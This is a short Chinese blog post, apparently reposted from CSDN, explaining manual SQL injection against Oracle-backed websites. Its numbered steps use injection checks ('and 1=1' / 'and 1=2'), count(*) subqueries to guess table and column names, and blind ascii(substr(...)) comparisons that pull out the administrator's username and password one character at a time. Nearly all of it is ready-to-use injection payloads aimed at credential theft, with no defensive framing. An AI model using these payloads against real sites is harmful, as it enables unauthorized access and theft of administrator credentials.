Oracle手工注入

爆破用户名和密码

1.使用 and1=1/and1=2 判断是否存在注入

2.判断存在的表

网站后加上:and (select count(*) from admin)<>0

将   *  改为  name,pwd,等可以判断表里边的列名

返回正常,则存在admin,,同理判断   username、managerde,pass、password,pwd 等用表名

3.爆管理员的账号和密码

and(select count(*) from admin where length(name)>=5)=1

判断用户名的长度,将  admin  改为  密码的,,即可爆破密码长度

 4.爆破用户名和密码,使用ascii码

and (select count(*) from admin where ascii(substr(name,1,1))>=9)=1

判断第一个字母的ASCII码大小,对应acsii码表,得到密码的第一位

同理,将(name,1,1)改为 (name,2,1)

将 name  改为 pwd  就可以查找密码了

猜你喜欢

转载自blog.csdn.net/qq_41934929/article/details/83032602
今日推荐